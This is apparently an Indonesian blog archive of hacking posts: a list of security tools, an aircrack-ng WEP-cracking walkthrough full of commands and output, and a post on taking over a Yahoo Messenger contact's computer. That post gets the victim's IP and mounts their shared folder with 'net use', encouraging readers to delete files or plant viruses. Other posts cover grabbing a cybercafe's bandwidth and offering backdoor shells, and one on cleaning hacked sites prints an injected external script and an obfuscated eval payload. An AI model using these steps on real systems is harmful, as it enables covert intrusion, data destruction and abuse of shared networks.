Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Sabtu, 10 Maret 2012

10 Tool Favorit Hacker

Pembuat NMAP telah melakukan survei terhadap 100 tools favorit hacker kepada pengikut di milis nmap-hackers. ada Sekitar 3,243 user memberikan jawaban mereka pada voting tool hacker favorit. 100 tool favorit hacker dapat dilihat pada situs www.insecured.org
Berikut ini akan saya tuliskan 10 tools favorit hacker yang mendapatkan suara terbanyak, survei ini diambil pada tahun 2006.
1.Nessus
tool ini diciptakan kurang lebih di tahun 1998 dan kemudian disebarluaskan secara bebas. Nessus merupakan sebuah aplikasi untuk mencari celah keamanan di sebuah sistem komputer. Menurut situs resmi dari tools ini yang ada di www.nessus.org, tool tersebut sudah banyak digunakan oleh para hacker dan banyak perusahaan yang ada di dunia.
2.Snort
Snort bisa dibilang merupakan sebuah IDS, IDS adalah sebuah tool untuk mencegah dan mendeteksi suatu serangan pada sistem komputer. Apabila Anda berminat untuk mencoba tools ini, anda bisa mendownloadnya di www.snort.org.
3.Kismet
Kismet merupakan suatu tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , dan tools ini juga dapat menangkap paket pada suatu sistem jaringan dan menjadi suatu IDS (intrusion detection System).
Untuk informasi lebih lanjut tentang kismet, anda bisa melihatnya pada situs resmi nya di http://www.kismetwireless.net atau anda juga bisa masuk ke #kismet irc.freenode.net.
4.Metasploit Framework
Metasploit Framework merupakan suatu proyek open source . Tools ini Diciptakan menggunakan bahasa Perl dan tools ini terdiri dari komponen pelengkap dan telah dicompile menggunakan bahasa C, assembler dan Python. Tools ini bisa bekerja di sistem operasi UNIX, Linux dan juga Windows. untuk informasi lebih lanjut dapat dilihat pada situs http://www.metasploit.com.
5.Netcat
Netcat merupakan suatu tool networking utility yang bisa membaca dan juga menuliskan data yang ada pada suatu koneksi dalam suatu jaringan dengan melalui protokol TCP/IP.
Beberapa Fitur yang ada di Netcat adalah :
» Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter pada suatu jaringan
» Port scanner, fitur ini berfungsi untuk mendeteksi port yang sedang terbuka.
» Buffered send-mode dan hexdump RFC854 telnet.
6.Hping
DenganTool tersebut kita dapat menguji kemampuan sebuah firewall, dan juga mencari port yang sedang terbuka, kita juga dapat menguji keamanan pada suatu jaringan dengan menggunakan beragam jenis protokol, dan juga kita dapat memperoleh informasi sistem operasi, dan mengevaluasi protokol TCP/IP.
7.TCPDump
Admin pada jaringan yang menggunakan tool ini dapat melakukan monitor lalu lintas dan juga menganalisa suatu permasalahan apabila sedang terjadi gangguan. Tcpdump digunakan untuk meng-capture data(BPF / BSD Packet Filter). BPF akan menerima sebuah salinan dari driver pengirim dan juga penerima paket.
8. John The Ripper
Sebuah password cracker yang sudah ada sejak lama dan selalu menjadi tools favorit hacker .
9. Cain And Abel
Dengan Tool ini kita bisa mengumpulkan password menggunakan suatu metode yang disebut dengan network sniffing, dengan tools ini kita dapat melakukan cracking password, Brute-Force and juga Cryptanalysis attacks, merekam suatu pembicaraan yang menggunakan VoIP, cracking suatu jaringan wireless, dan juga menganalisa suatu trafik pada sebuah jaringan. www.oxid.it
10. WireShark / Ethereal
tool ini dapat kita gunakan untuk menganalisa protokol jaringan. dapat berfungsi menjadi sebuah sniffer. dengan tool ini kita juga dapat Memantau lalu lintas yang ada di internet.
sumber:/hasiaulia.net

Jumat, 09 Desember 2011

CARA HACK WEP DENGAN AIRCRACK !!!


 Pengenalan
Tutorial ini menuntun Anda meskipun kasus yang sangat sederhana untuk crack kunci WEP . Hal ini dimaksudkan untuk membangun keterampilan dasar Anda dan mendapatkan Anda akrab dengan konsep-konsep. Ini mengasumsikan Anda memiliki kartu nirkabel yang bekerja dengan driver yang sudah ditambal untuk injeksi.
Dianjurkan agar Anda melakukan percobaan dengan titik akses nirkabel rumah Anda untuk mendapatkan keyamanan &bebas dengan ide-ide dan teknik. Jika Anda tidak memiliki titik akses tertentu, ingatlah untuk mendapatkan izin dari pemilik sebelum bermain dengan itu.
Saya ingin mengakui dan berterima kasih kepada tim aircrack-ng untuk menghasilkan suatu alat yang kuat yang hebat.
Harap kirimi saya setiap umpan balik yang konstruktif, positif atau negatif. Ide-ide pemecahan masalah tambahan dan tips sangat welcome.
Asumsi
Pertama, solusi ini mengasumsikan:
  • Anda menggunakan driver ditambal untuk injeksi.
  • Anda secara fisik cukup dekat untuk mengirim dan menerima paket jalur akses. Ingatlah bahwa hanya karena Anda dapat menerima paket dari titik akses tidak berarti Anda mungkin akan dapat mengirimkan paket ke AP. Kekuatan kartu nirkabel biasanya kurang maka kekuatan AP. Jadi, Anda harus secara fisik cukup dekat untuk paket Anda dikirimkan untuk mencapai dan diterima oleh AP.
  • Ada setidaknya satu klien kabel atau nirkabel tersambung ke jaringan dan mereka aktif. Alasannya adalah bahwa tutorial ini tergantung pada menerima setidaknya satu paket permintaan ARP dan jika tidak ada klien aktif maka tidak akan ada paket permintaan ARP.
  • Anda menggunakan v0.9 dari aircrack-ng. Jika Anda menggunakan versi yang berbeda maka beberapa pilihan umum mungkin harus diubah.
Pastikan semua asumsi di atas adalah benar, jika tidak, nasihat yang berikut tidak akan bekerja. Dalam contoh di bawah, Anda akan perlu untuk mengubah “ath0″ dengan nama interface yang spesifik untuk kartu nirkabel Anda.
Peralatan yang digunakan
Dalam tutorial ini, peralatan yang digunakan adalah :
  • Alamat MAC dari PC suite menjalankan aircrack-ng: 0:00 F: B5: 88: AC: 82
  • BSSID (MAC alamat titik akses): 00:14:06 C: 7E: 40:80
  • ESSID (atau nama jaringan nirkabel): Lombok_Creck84
  • Jalur akses saluran: 9
  • Wireless interface: ath0
Anda harus mengumpulkan informasi yang setara untuk jaringan Anda akan bekerja pada. Kemudian hanya mengubah nilai dalam contoh di bawah ini ke jaringan tertentu.
Solusi
Ikhtisar Solusi
Untuk crack WEP kunci untuk jalur akses, kita perlu mengumpulkan banyak vektor inisialisasi (infus). Jaringan lalu lintas normal tidak biasanya menghasilkan ini IVs sangat cepat. Secara teoritis, jika kamu bersabar, Anda dapat mengumpulkan infus cukup untuk memecahkan WEP kunci dengan hanya mendengarkan lalu lintas jaringan dan menyimpan mereka. Karena tidak satupun dari kita yang sabar, kita menggunakan teknik yang disebut injeksi untuk mempercepat proses. Injeksi melibatkan memiliki titik akses (AP) mengirim ulang paket yang dipilih berulang sangat cepat. Hal ini memungkinkan kita untuk menangkap sejumlah besar infus dalam waktu singkat.
Setelah kami telah menangkap sejumlah besar infus, kita dapat menggunakannya untuk menentukan WEP kunci.
Berikut adalah langkah-langkah dasar kita akan pergi melalui:
  1. Jalankan interface nirkabel dalam mode monitor pada saluran AP tertentu
  2. Uji kemampuan injeksi perangkat nirkabel untuk AP
  3. Gunakan aireplay-ng untuk melakukan otentikasi palsu dengan jalur akses
  4. Mulai airodump-ng di AP saluran dengan BSSID filter untuk mengumpulkan infus unik baru
  5. Mulai aireplay-ng dalam modus memutar ulang permintaan ARP untuk menyuntikkan paket
  6. Jalankan aircrack-ng untuk memecahkan kunci menggunakan infus dikumpulkan
Langkah 1 – Jalankan interface nirkabel dalam mode monitor pada saluran AP
Tujuan dari langkah ini adalah untuk menempatkan kartu anda ke dalam apa yang disebut mode monitor. Mode monitor adalah mode dimana kartu Anda dapat mendengarkan setiap paket di udara. Biasanya kartu Anda hanya akan “mendengar” paket yang ditujukan kepada Anda. Dengan mendengar setiap paket, kita kemudian dapat memilih beberapa untuk injeksi. Selain itu, hanya (ada beberapa pengecualian jarang) mode monitor memungkinkan Anda untuk menyuntikkan paket. (Catatan:. Prosedur ini berbeda untuk non-Atheros kartu)
Pertama berhenti ath0 dengan memasukkan:
airmon-ng ath0 berhenti
Sistem merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP hancur)
Masukkan “iwconfig” untuk memastikan tidak ada antarmuka athX lainnya.Seharusnya terlihat seperti ini:
lo ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel.
Jika ada interface athX tersisa, kemudian berhenti masing-masing. Ketika Anda selesai, jalankan “iwconfig” untuk memastikan ada yang tersisa satupun.
Sekarang, masukkan perintah berikut untuk memulai kartu nirkabel pada saluran 9 dalam mode monitor:
airmon-ng start wifi0 9
Pengganti nomor saluran yang berjalan pada AP Anda untuk “9″ pada perintah di atas. Hal ini penting. Anda harus memiliki kartu nirkabel Anda terkunci ke saluran AP untuk langkah-langkah berikut dalam tutorial ini untuk bekerja dengan benar.
Catatan: Dalam perintah ini kita menggunakan “wifi0″ bukan antarmuka nirkabel kami “ath0″. Hal ini karena driver madwifi-ng yang digunakan. Untuk pengemudi lain, gunakan nama antarmuka nirkabel. Contoh: “wlan0″ atau “rausb0″.
Sistem akan merespon:
Antarmuka Chipset Atheros driver madwifi wifi0-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Anda akan melihat bahwa “ath0″ dilaporkan di atas sebagai dimasukkan ke dalam mode monitor.
Untuk mengkonfirmasi antarmuka setup dengan benar, masukkan “iwconfig”.
Sistem akan merespon:
lo ada ekstensi nirkabel. wifi0 tidak ada ekstensi nirkabel. eth0 tidak ada ekstensi nirkabel. ath0 IEEE 802.11g ESSID: “” Nickname: “” Mode: Monitor Frequency: 2,452 GHz Access Point: F 00:00: B5: 88: AC: 82 Bit Rate: 0 kb / s Tx-Power: 18 dBm = 0 Sensitivitas / 3 Retry: off RTS thr: off Fragment thr: Enkripsi kunci dari: Manajemen Matikan: Link Kualitas off = 0 / 94 tingkat Sinyal =- 95 dBm Noise level =- 95 dBm Rx invalid nwid: 0 Rx invalid crypt: 0 Rx invalid frag: 0 Tx berlebihan retries: 0 Invalid misc: 0 Missed beacon: 0
Dalam tanggapan di atas, Anda dapat melihat bahwa ath0 dalam mode monitor, pada frekuensi 2.452GHz yang adalah saluran 9 dan Access Point menunjukkan alamat MAC dari kartu nirkabel Anda. Harap dicatat bahwa hanya madwifi-ng driver menunjukkan alamat MAC dari kartu nirkabel Anda, pembalap lain tidak melakukan hal ini. Jadi semuanya baik. Hal ini penting untuk memastikan semua informasi ini sebelum melanjutkan, jika langkah-langkah berikut tidak akan bekerja dengan baik.
Untuk mencocokkan frekuensi untuk saluran, check out:http://www.rflinx.com/help/calculations/ # 2.4ghz_wifi_channels kemudian pilih “Channel Seleksi Wifi dan Channel Tumpang tindih” tab. Ini akan memberi Anda frekuensi untuk setiap saluran.
Langkah 2 – Uji Perangkat Wireless Packet Injection
Tujuan dari langkah ini memastikan bahwa kartu Anda berada dalam jarak AP Anda dan dapat menyuntikkan paket untuk itu.
Masukkan:
aireplay-ng-e -9 boneka-C 00:14:06: 7E: 40:80 ath0
Dimana:
  • -9 Berarti injeksi tes
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • ath0 adalah nama antarmuka nirkabel
Sistem harus merespon dengan:
09:23:35 Menunggu mercusuar bingkai (BSSID: 00:14:06 C: 7E: 40:80) di channel 9 09:23:35 siaran permintaan penyelidikan Mencoba … 09:23:35 Injeksi bekerja! 09:23:37 Ditemukan 1 AP 09:23:37 Mencoba permintaan penyelidikan diarahkan … 09:23:37 00:14:06 C: 7E: 40:80 – channel: 9 – ‘boneka’ 09:23:39 Ping (min / avg / max): 1.827ms/68.145ms/111.610ms Power: 33,73 09 : 30/30 23:39: 100%
Baris terakhir adalah penting. Idealnya itu harus mengatakan 100% atau persentase yang sangat tinggi. Jika rendah maka Anda terlalu jauh dari AP atau terlalu dekat. Jika nol maka injeksi tidak bekerja dan Anda perlu patch driver Anda atau menggunakan driver yang berbeda.
Langkah 3 – Mulai airodump-ng untuk menangkap infus
Tujuan dari langkah ini adalah untuk menangkap infus yang dihasilkan. Langkah ini dimulai airodump-ng untuk menangkap IVs dari titik akses tertentu.
Buka konsol sesi lain untuk menangkap infus yang dihasilkan. Kemudian masukkan:
airodump-ng-c 9 – BSSID 00:14:06 C: 7E: 40:80-w ath0 keluaran
Dimana:
  • -C 9 adalah saluran untuk jaringan nirkabel
  • - BSSID 00:14:06 C: 7E: 40:80 adalah titik akses alamat MAC. Hal ini menghilangkan lalu lintas asing.
  • -W capture awalan nama file untuk file yang akan berisi infus.
  • ath0 adalah nama antarmuka.
Sementara suntikan berlangsung (kemudian), layar akan terlihat seperti ini:
CH 9] [Berlalu: 8 mins] [2007/3/21 19:25 BSSID PWR Beacons # RXQ Data, # / s CH MB ENC ESSID cipher AUTH 00:14:06 C: 7E: 40:80 42 100 5240 1783 07 338 9 54   WEP  WEP          Lombok_Creck84  BSSID STATION PWR Hilang Probe Paket 00:14:06 C: 7E: 40:80 00:00 F: B5: 88: AC: 82 42 0 183.782
Langkah 4 - Gunakan aireplay-ng # untuk melakukan otentikasi palsu dengan jalur akses
Dalam rangka untuk jalur akses untuk menerima sebuah paket, sumber alamat MAC harus sudah terkait. Jika sumber alamat MAC Anda suntik tidak terkait maka AP mengabaikan paket tersebut dan mengirimkan sebuah "deauthentication" paket dalam cleartext. Dalam keadaan ini, tidak ada infus baru tercipta karena AP adalah mengabaikan semua paket disuntikkan.
Kurangnya hubungan dengan jalur akses adalah satu alasan terbesar mengapa injeksi gagal. Ingat aturan emas: MAC Anda gunakan untuk injeksi harus terkait dengan AP dengan baik menggunakan otentikasi palsu atau menggunakan MAC dari klien yang sudah terkait.
Untuk mengasosiasikan dengan jalur akses, menggunakan otentikasi palsu:
aireplay-ng -1 0-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • -1 Berarti otentikasi palsu
  • 0 reassociation waktu dalam hitungan detik
  • -E Lombok_Creck84 adalah nama jaringan nirkabel
  • -C 00:14:06: 7E: 40:80 adalah titik akses alamat MAC
  • -H F 00:00: B5: 88: AC: 82 adalah alamat MAC kartu kita
  • ath0 adalah nama antarmuka nirkabel
Sukses terlihat seperti:
18:18:20 Otentikasi Mengirim Permintaan 18:18:20 18:18:20 Otentikasi berhasil Mengirim Permintaan 18:18:20 Asosiasi Asosiasi sukses :-)
Atau variasi lain untuk jalur akses pemilih:
aireplay-ng -1 6000-o 1-q 10-e teddy-C 00:14:06: 7E: 40:80-h 00:00 F: B5: 88: AC: 82 ath0
Dimana:
  • 6000 - Reauthenticate setiap detik 6000. Periode panjang juga menyebabkan tetap hidup paket akan dikirim.
  • -O 1 - Kirim hanya satu set paket pada suatu waktu. Default adalah beberapa dan ini membingungkan beberapa AP.
  • -Q 10 - Mengirim paket tetap hidup setiap 10 detik.
Sukses terlihat seperti:
18:22:32 Mengirim Permintaan 18:22:32 Otentikasi Authentication sukses 18:22:32 Mengirim Permintaan 18:22:32 Asosiasi Asosiasi sukses :-) 18:22:42 Mengirim tetap-hidup paket 18:22:52 Mengirim tetap -hidup paket # dan seterusnya.
Berikut adalah contoh dari apa otentikasi gagal terlihat seperti:
08:28:02 Otentikasi Permintaan Mengirim 18:28:02 Otentikasi 18:28:02 sukses Mengirim Permintaan 18:28:02 Asosiasi Asosiasi sukses :-) 18:28:02 Punya paket deauthentication! 18:28:05 Mengirim Permintaan 18:28:05 Otentikasi Authentication sukses 18:28:05 Mengirim Permintaan Asosiasi 18:28:10 Mengirim Permintaan Otentikasi Authentication 18:28:10 sukses 18:28:10 Mengirim Permintaan Asosiasi
Perhatikan "Punya paket deauthentication" dan retries terus menerus di atas.Jangan lanjutkan ke langkah berikutnya sampai Anda memiliki otentikasi yang palsu berjalan dengan benar.
Tips Pemecahan Masalah
  • Beberapa jalur akses yang dikonfigurasi untuk hanya memperbolehkan alamat MAC dipilih untuk mengasosiasikan dan menghubungkan. Jika hal ini terjadi, Anda tidak akan dapat berhasil melakukan otentikasi palsu kecuali jika Anda tahu salah satu alamat MAC pada daftar yang diperbolehkan. Jika Anda menduga ini adalah masalah, gunakan perintah berikut ketika mencoba untuk melakukan otentikasi palsu. Mulai sesi lain dan ...
Jalankan: tcpdump-n-vvv-s0-e-i
Anda kemudian akan mencari pesan kesalahan.
  • Jika suatu saat Anda ingin mengonfirmasi Anda benar terkait adalah dengan menggunakan tcpdump dan melihat paket. Mulai sesi lain dan ...
Jalankan: "tcpdump-n-e-s0-vvv-i ath0"
Berikut ini adalah tcpdump khas pesan galat yang Anda cari:
 11:04:34.360700 314us BSSID: 00:14:06 c: 7e: 40:80 DA: F 00:00: B5: 88: AC: 82 SA: 00:14:06 c: 7e: deauthentication 40:80: Kelas 3 bingkai diterima dari stasiun nonassociated
Perhatikan bahwa titik akses (00:14:06 c: 7e: 40:80) memberitahu sumber (0:00 F: B5: 88: AC: 82) Anda tidak terkait. Artinya, AP tidak akan memproses atau menerima paket disuntikkan.
Jika Anda ingin memilih hanya paket deauth dengan tcpdump maka Anda dapat menggunakan: "tcpdump-n-e-s0-vvv-i ath0 | grep-i deauth". Anda mungkin perlu tweak frase "deauth" untuk memilih paket yang tepat yang Anda inginkan.
Langkah 5 - Mulai aireplay-ng dalam modus memutar ulang permintaan ARP
Tujuan dari langkah ini adalah mulai aireplay-ng dalam mode yang mendengarkan permintaan ARP kemudian reinjects mereka kembali ke jaringan.Untuk penjelasan ARP, lihat halaman PC Magazine atau Wikipedia . Alasan kita memilih paket ARP permintaan karena AP biasanya akan rebroadcast mereka dan menghasilkan IV baru. Sekali lagi, ini adalah tujuan kami, untuk mendapatkan sejumlah besar infus dalam waktu singkat.
Buka konsol sesi lain dan masukkan:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Ini akan mulai mendengarkan permintaan ARP dan ketika mendengar satu, aireplay-ng akan segera mulai menyuntikkan. Pada jaringan rumah Anda, di sini adalah cara mudah untuk menghasilkan sebuah permintaan ARP: Pada PC kabel, ping IP tidak ada di LAN rumah Anda.
Berikut adalah apa layar tampak seperti ketika ARP permintaan sedang disuntikkan:
Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Anda dapat mengkonfirmasi bahwa Anda suntik dengan memeriksa airodump-ng layar Anda. Paket data harus meningkat pesat. The "# / s" harus angka yang layak. Namun, yang layak tergantung pada berbagai faktor besar. Sebuah jarak umumnya adalah 300 sampai 400 paket data per detik. Hal ini dapat serendah 100/second dan setinggi 500/second satu.
Tips Pemecahan Masalah
  • Jika Anda menerima pesan yang mirip dengan "Punya paket deauth / disassoc. Apakah sumber terkait mac? ", Ini berarti Anda telah kehilangan hubungan dengan AP. Semua paket Anda disuntikkan akan diabaikan. Anda harus kembali ke langkah otentikasi palsu (Langkah 3) dan berhasil asosiasi dengan AP.
Langkah 6 - Jalankan aircrack-ng untuk mendapatkan kunci WEP
Tujuan dari langkah ini adalah untuk mendapatkan WEP kunci dari IV berkumpul di langkah sebelumnya.
Catatan: Untuk tujuan belajar, Anda harus menggunakan 64 bit WEP kunci pada AP Anda untuk mempercepat proses cracking. Jika hal ini terjadi, maka Anda dapat menyertakan "-n 64" untuk membatasi pemeriksaan kunci 64 bit.
Dua metode akan ditampilkan. Disarankan Anda mencoba baik untuk tujuan belajar. Dengan mencoba kedua metode, Anda akan melihat dengan cepat metode PTW berhasil menentukan WEP kunci dibandingkan dengan metode FMS / Korek. Sebagai pengingat, metode PTW hanya bekerja dengan sukses dengan arp permintaan / jawaban paket. Karena tutorial ini mencakup injeksi paket ARP request, Anda benar dapat menggunakan metode ini. Persyaratan lainnya adalah bahwa Anda menangkap paket penuh dengan airodump-ng. Artinya, tidak menggunakan "- ivs" pilihan.
Mulai sesi lain konsol dan masukkan:
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -Z memanggil PTW WEP metode-retak.
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Untuk juga menggunakan metode FMS / Korek, mulai lagi sesi konsol dan masukkan:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Dimana:
  • -B 00:14:06 C: 7E: 40:80 memilih satu titik akses kita tertarik ini opsional . Karena ketika kita awalnya menangkap data, kita menerapkan filter untuk hanya menangkap data untuk satu AP.
  • Output topi *. memilih semua file yang dimulai dengan "output" dan berakhir di ". topi".
Jika Anda menggunakan 1.0 RC1-, menambahkan opsi "-K" untuk serangan FMS / Korek. (1.0-RC1 default untuk PTW.)
Anda dapat menjalankan ini sementara menghasilkan paket. Dalam waktu singkat, WEP kunci akan dihitung dan disajikan. Anda akan membutuhkan sekitar 250.000 infus untuk 64 bit dan 1.500.000 infus untuk 128 bit kunci. Jika Anda menggunakan serangan PTW, maka Anda akan membutuhkan sekitar 20.000 paket untuk 64-bit dan 40.000 sampai 85.000 paket untuk 128 bit. Ini sangat perkiraan dan ada banyak variabel untuk berapa banyak infus yang sebenarnya Anda butuhkan untuk memecahkan Kunci WEP.
Berikut adalah apa sukses terlihat seperti:
                                              Aircrack-ng 0,9
KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%
Perhatikan bahwa dalam kasus ini dibutuhkan jauh lebih sedikit maka diperkirakan 250.000 infus untuk memecahkan kuncinya. (Untuk contoh ini, serangan FMS / Korek digunakan.)

Rabu, 07 Desember 2011

Hack Komputer Orang Dengan YM!

 pernah gak terpikir untuk masok ke data2 komputer orang,.?
gak pernah..? mati aja udah lo...wkwakawkakwkwa...
just kidding bro..namanya juga belajar2...
ok lahh kali ne ane share kan dikit pengalaman ane masok ke data komputer orang tanpa sepengetahuan dya..ahahahha
lanngsung aja ..
Langkah pertama..modal-nya kita harus tahu IP target yang ingin kita serang terlebih dahulu, dengan cara:

1. login YM
2. Ajak target untuk PM an
3. Paksa target terima file kamu..entah kirim apa kek..foto atau data apa aja (buat ngulur waktu)

kalau target sudah terpancing...lakukan Langkah kedua:

1.Klik start, lanjutkan dengan mengklik RUn
2. Ketik 'cmd' (tidak pakai tanda petik) akhiri dengan OK
3. Langkah selanjutnya, ketik : 'Netstat -an' (tidak pakai tanda petik) lanjutkan dengan OK
4. nanti akan muncul banyak keterangan di command prompt kamu...

lalu cari tanda 5050 <,sebelum tanda ini, tertulis angka beberapa digit...itulah IP target yg saat ini sedang menerima file pancingan dari kamu tadi.

Ip dah dapat...tinggal eksekusi nih: Halaman Command Promt jangan di tutup dulu.

Untuk eksekusi..neh dibutuhkan keberuntungan jika anda ingin mengintip file yang disimpan target di komputernya. Hehe...hehe...ketawa terus..awali dengan senyum yah..biar berhasil bro. Yo'i, kalau dah dapat...masih di halaman command promt kamu tadi:

1. ketik : ''net use: h \\ (Ip target)\shareddocs'' <

Kalau anda berhasil ..maka akan ada keterangan share docs succes..(Kalau sukses...silahkan anda buka drive anda di My Computer..maka akan ada tambahan drive baru..itu adalah drive dari komputer target. Karna anda telah terhubung dengan komputer target, jadi silahkan intip semua file yang tersimpan di komputernya..tentu semua tersedia dikomputer anda skrg...mau hapus..silahkan..mau nambah silahkan..mau nitip Virus..monggo...hehe.dah dikuasai kok..)

Catatan: Kalau keterangan error..maka sebenarnya target memasang security yang cukup,jadi silahkan pikirkan cara lain.


Keberuntungan adalah awal dari keberhasilan...iya kali? soalnya kalau gk beruntung..gmn mau sukses...hhehwhehe


Selamat mencoba deh.
semoga bermanfaat..

Rabu, 30 November 2011

Cara Hacking Bandwidth Warnet

pernah saya Browsing Internet di warnet Browsingnya pelan sekali,..terus saya coba otak-atik dan cari sebabnya di mba "Google ternyata itu disebabkan karena tiap bilik atau room udah di batasi bitrate N bandwithnya di mikrotik warnetnya… nah sekarang ada Tips untuk mengatasi masalah tersebut caranya ikuti petunjuk dibawah ini :
1. Buka Browser Mozilla Firefox…
2. Pada Address Bar Ketik : ABOUT:CONFIG
3. Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE >INTEGER

5. Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6. Kemudian REFRESH atau Tekan F5
7. Pada Address Bar Ketik : ABOUT:BLANK. Klik Menu:
-Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
-Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
-Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9. Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan :
10.Kemudian Tekan OK Lalu REFRESH ( F5 )
11.Masuk ke website ini https://addons.mozilla.org/en-US/firefox/addon/125?id=125&applicationfiltered=firefox
12.Download Software SwitchProxy Tool Versi 1.3.4
13.Setelah Selesai Jangan Tekan Tombol UPDATE
14.Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15.Tutup Semua Browser Mozilla FireFox,
16.Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4
Yang sudah di Install Tadi
17.Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi
dan Address Bar.
18. Sekarang Browser Mozilla Siap Untuk DiJalankan..

Sedikit Tambahan Saja :
— Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy
Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap
Kecepatan Koneksi Internet anda.
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk
Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang
Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan “BROADBAND atu VSAT”
- OpenDNS. Daftarkan ke opendns.com, gratis juga.. so setting DNS TCP/IP.
- Tingkatkan bandith PC sampe 20%. Microsoft menggunakan 20% cadangan dari
bandwidth untuk update dan melaporkan kondisi computer dll,
ini cara menonaktifkan fungsi ini : Click Start–>Run–>ketik gpedit.msc —>ok
Selanjutnya ke –>Local Computer Policy–>Computer Configuration–>Administrative
Templates–>Network–>QOS Packet Scheduler–>Limit Reservable Bandwidth—->klik
2x Limit Reservable Bandwidth Disana tertulis is not configured tapi kenyataannya (baca
dibawah explain) “By default, the Packet Scheduler limits the system to 20 percent of the
bandwidth of a connection, but you can use this setting to override the default.”jadi
triknya adalah pilih enable kemudian di set ke 0 .Sehingga system tidak mempunyai
cadangan seperti kondisi default yang sampai 20%
Jika ingin lebih brutale lagi tambahkan addon FastererFox+cfosSpeed yang berguna
untuk mengkompres data yang masuk lewat koneksi dialup.
jangan Lupa comand sob" ^_^

Minggu, 27 November 2011

Koleksi Shell/Backdoor Gratisss

Buat yang suka Pepesan Silahkan di pilih apa kesukaan shell anda, dan klik di nama nya untuk mendownload nya...
List Shell :
 
 semoga bermanfaat ^_^

Jumat, 18 November 2011

Cara Mengatasi Website Yang Terkena Hack dan Badware

Sahabat-sahabat.. seperti yang telah saya janjikan sebelumnya di artikel yang berjudul Diantara Tanda Website Yang Terkena Hack dan Badware, bahwa saya akan menuliskan pengalaman mengenai bagaimana caranya saya mengatasi atau mengembalikan beberapa website atau blog yang telah terkena oleh hack dan badware supaya bisa kembali kepada keadaan semula, dan mungkin hal ini akan sangat berguna.
Cara mengatasi website yang terkena hack dan badware yang bisa kita lakukan adalah sebagai berikut:
1. Pada saat disusupi oleh hacker

Karena pengalaman saya pada saat itu hackernya hanya mengubah salah satu artikel di blog (WordPress.org) tanpa menyerang database serta menghapus file-file di server hosting, maka kita cukup:
  • Mengubah password akun (account) untuk masuk ke cPanel hosting.
  • Mengubah password akun (account) untuk masuk ke dashboard WordPress.
  • Mengembalikan artikel yang telah diubah oleh hacker tersebut kepada keadaan semula.
  • Menginstal beberapa plugin “pengaman” wordpress.
2. Pada saat terinfeksi HTML Script InjectionPHP Script Injection dan Java Script Injection
HTML Script Injection, sesuai dengan namanya maka tentu saja menyerang pada file-file hosting yang berekstensi .html. Kode script yang  telah diinjeksikan ke banyak file .html adalah seperti ini:
<scrxpt>src=http://jeremyjacksonevents.com/celebs/rumble66.php></scrxpt>
PHP Script Injection, sesuai dengan namanya maka tentu  saja menyerang pada file-file hosting yang berekstensi PHP. Kode script yang telah diinjeksikan ke beberapa file .php adalah menggunakan kode Eval seperti berikut
eval(base64_decode(‘aWYoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PuAnJangBangedddddddddKodenyaaaaaaaaaaaaaaaaaaaaaaaA
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJ10pKTs=’)); ?><?php
